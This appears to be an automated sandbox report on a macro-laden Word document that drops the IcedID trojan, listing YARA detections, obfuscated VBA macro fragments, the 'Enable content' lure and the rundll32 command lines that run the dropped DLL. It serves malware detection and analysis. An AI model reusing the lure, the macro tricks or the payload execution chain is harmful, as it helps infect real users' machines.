Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" button on I W a the top bar, and then cIick"Enable content". . 0 e ="F- "" m
Source: Screenshot number: 4 Screenshot OCR: Enable content". . 0 e ="F- "" m " " "" " "" " 8==",== " ii; It ' 4#1,1 0 Pa,e, I of
Submitted sample is a known malware sample
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Dropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 Family: APT29 Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 Description: APT29 has operated since at least 2008 and attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated, and organized cyber-espionage group to collect intelligence in support of foreign and security policy decision-making. References: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdfhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdfhttps://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdfhttps://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Jump to dropped file
Document contains an embedded VBA macro with suspicious strings
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("EGbu4DYv1ISu"), VbGet, )
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((laMT7W1FQ9("u2vxtRyF")), laMT7W1FQ9("bsAPpUjyw"), VbGet, laMT7W1FQ9("Hba7JAe"))
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Set = CallByName((), laMT7W1FQ9("URvEhK0Z"), VbGet, )
Yara signature match
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Detected potential crypto function
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800024FC 5_2_00000001800024FC
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Private Sub Document_Open()
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess, 4_2_00041203
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041A33 NtOpenProcessToken,NtClose, 4_2_00041A33
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken, 4_2_00041A8C
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000419E3 NtOpenProcessToken,NtSetInformationToken,NtClose, 4_2_000419E3
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D5FE6 NtCreateSection,NtMapViewOfSection, 5_2_000007FEF74D5FE6
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D5FF9 NtCreateSection, 5_2_000007FEF74D5FF9
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF4786325F45128C5F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file does not import any functions
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr Static PE information: No import functions for PE file found
Source: y84FE.tmp.dll.0.dr Static PE information: No import functions for PE file found
PE file contains strange resources
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Document contains embedded VBA macros
Source: dodsonimaging,file,08.11.2022.doc OLE indicator, VBA macros: true
Source: ~DF4786325F45128C5F.TMP.0.dr OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: dodsonimaging,file,08.11.2022.doc Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 Jump to behavior
Source: dodsonimaging,file,08.11.2022.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\dodsonimaging,file,08.11.2022.doc
Source: dodsonimaging,file,08.11.2022.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6B5F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@5/14@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000414BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW, 4_2_000414BD
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Command line argument: RunDLL 4_2_00041203
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: title field not present or empty
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: author field not present or empty
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: edited time not present or 0
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: dodsonimaging,file,08.11.2022.doc Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: dodsonimaging,file,08.11.2022.doc Static file information: File size 2298458 > 1048576
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000419CA push ecx; ret 4_2_000419DD
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D8BC2 push rax; ret 5_2_000007FEF74D8BDE
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D610E push rdx; ret 5_2_000007FEF74D611B
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
PE file contains an invalid checksum
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr Static PE information: real checksum: 0x59d91 should be: 0x5f194
Source: y84FE.tmp.dll.0.dr Static PE information: real checksum: 0x59d91 should be: 0x5f194
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
